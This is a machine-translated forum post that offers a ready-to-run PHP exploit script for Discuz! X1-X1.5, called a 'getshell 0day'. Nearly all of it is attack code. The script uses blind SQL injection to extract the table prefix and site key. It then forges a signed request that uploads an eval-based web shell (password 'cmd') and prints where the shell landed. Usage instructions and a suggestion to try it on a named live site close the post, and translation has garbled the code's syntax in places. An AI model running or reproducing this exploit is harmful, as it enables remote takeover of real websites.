Discuz! X1.5getshell0day directly post the code? Phpprint_r (+ ----------------------------------------------------------------------------- + Discuz! X1-1.5notify_credit.phpBlindSQLinjectionexploitbytoby572010.11.05mail: toby
Discuz! X1.5 getshell 0day
Directly post and use code
Php
Print_r ('
+ --------------------------------------------------------------------------- +
Discuz! X1-1.5 notify_crEdIt. php Blind SQL injectionExPloit by toby57 2010.11.05
Mail: toby57 at 163 dot com
Team: http://www.xiaoweio.cn
Note: alibaba adds the subsequent getshell code.
+ --------------------------------------------------------------------------- +
');
If ($ argc <2 ){
Print_r ('
+ --------------------------------------------------------------------------- +
Usage: php '. $ argv [0].' url [pre]
Example:
Php '. $ argv [0]. 'HTTP: // localhost/
Php '. $ argv [0]. 'HTTP: // localhost/xss _
+ --------------------------------------------------------------------------- +
');
Exit;
}
Error_reporting (7 );
Ini _Set('Max _ exeCutIon _Time', 0 );
$ Url = $ argv [1];
$ Pre = $ argv [2]? $ Argv [2]: 'pre _';
$ Target = parse_url ($ url );
ExTrAct ($ target );
$ Path1 = $ path. '/api/trade/policy_credit.php ';
$ Hash = array ();
$ Hash = array_merge ($ hash, range (48, 57 ));
$ Hash = array_merge ($ hash, range (97,102 ));
$ Tmp_expstr = "'";
$ Res = send ();
If (strpos ($ res, 'SQL syntax') = faLsE) {var _DuMp ($ res); die ('oooops. I can NOT hack it .');}
Preg_match ('/FROM \ s ([a-zA-Z _] +) forum_order/', $ res, $ match );
If ($ match [1]) $ pre = $ match [1];
$ Tmp_expstr = "'Union all select 0, 1, 0, 0, 0, 0, 0 FROM {$ pre} common_setting WHERE'' = '";
$ Res = send ();
If (strpos ($ res, "doesn't exist ")! = False ){
Echo "Table_pre is WRONG! \ NReady to Crack It. Please Waiting... \ n ";
For ($ I = 1; $ I <20; $ I ++ ){
$ Tmp_expstr = "'Union all select 0, 1, 0, 0, 0, 0, 0 FROM infoRmAtion_schema.ColUmns WHERE table_schema = database () AND table_name LIKE '% forum_post_tableId% 'And length (REPLACE (table_name, 'Forum _ post_tableid', '') = $ I AND'' = '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
$ Pre = '';
$ Hash2 = array ();
$ Hash2 = array_merge ($ hash2, range (48, 57 ));
$ Hash2 = array_merge ($ hash2, range (0, 97,122 ));
$ Hash2 [] = 95;
For ($ j = 1; $ j <= $ I; $ j ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash2 )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM information_schema.columns WHERE table_schema = database () AND table_name LIKE '% forum_post_tableid %' and mid (REPLACE (table_name, 'Forum _ post_tableid ', ''), $ j, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ Pre. = chr ($ k); break;
}
}
}
}
If (strlen ($ pre) {echo "\ nCracked... table_Pre :". $ pre. "\ n"; break;} else {die ('get Table_pre Failed .. ');};
}}};
Echo "Please Waiting... \ n ";
$ Sitekey = '';
For ($ I = 1; $ I <= 32; $ I ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM {$ pre} common_setting WHERE skey = 0x6d795f742574656b6579 and mid (svalue, {$ I}, 1) = 0x {$ char} AND ''= '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ Sitekey. = chr ($ k); break;
}}}}
/*
By: alibaba
Modified and added some code. If the code is successfully modified, the shell can be obtained.
The secret is: cmd
*/
If (strlen ($ sitekey )! = 32)
{
Echo "\ nmy_sitekey not found. try blank my_sitekey \ n ";
}
Else echo "\ nmy_sitekey: {$ sitekey} \ n ";
Echo "\ nUploading Shell ...";
$ Module = 'video ';
$ Method = 'authauthauth ';
$ Params = 'a: 3: {I: 0; I: 1; I: 1; s: 36: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4 ="; I: 2; s: 3: "php ";}';
$ Sign = md5 ($ module. '|'. $ method. '|'. $ params. '|'. $ sitekey );
$ Data = "module = $ module & method = $ method & params = $ params & sign = $ sign ";
$ Path2 = $ path. "/api/manyou/my. php ";
POST ($ host, 80, $ path2, $ data, 30 );
Echo "\ nGetting Shell LoCatIon... \ n ";
$File= '';
For ($ I = 1; $ I <= 32; $ I ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM {$ pre} common_member_field_home WHERE uid = 1 and mid (videophoto, {$ I}, 1) = 0x {$ char} AND ''= '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ File. = chr ($ k); break;
}
}
}
}
Echo "\ nShell: $ host $ path/data/avatar /".SuBstr ($ file, 0, 1). "/". substr ($ file, 1, 1). "/$ file. php ";
Exit;
FuNcTion sign ($ exp_str ){
Return md5 ("attach = tenpay &McH_vno = {$ exp_str} & retcode = 0 & key = ");
}
Function send (){
Global $ host, $ path1, $ tmp_expstr;
$ Expdata = "attach = tenpay & retcode = 0 & trade_no = % 2527 & mch_vno = ". urlencode ($ tmp_expstr )). "& sign = ". sign ($ tmp_expstr );
Return POST ($ host, 80, $ path1, $ expdata, 30 );
}
Function POST ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ''){
$ Buffer = '';
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, $ timeout );
If (! $ Fp) die ($ host. '/'. $ path. ':'. $ errstr. $ errno );
Else {
Fputs ($ fp, "POST $ path HTTP/1.0 \ r \ n ");
Fputs ($ fp, "Host: $ host \ r \ n ");
Fputs ($ fp, "Content-type: application/x-www-form-urlencoded \ r \ n ");
Fputs ($ fp, "Content-length:". strlen ($ data). "\ r \ n ");
Fputs ($ fp, "Connection: close \ r \ n ");
Fputs ($ fp, $ data. "\ r \ n ");
While (! Feof ($ fp ))
{
$ Buffer. = fgets ($ fp, 4096 );
}
Fclose ($ fp );
}
Return $ buffer;
}
?>
Copy and save as xx. php php.exe xx. php www.xiaoweio.cn
Try that kind of station. The local test fails, and the virtual machine has a problem.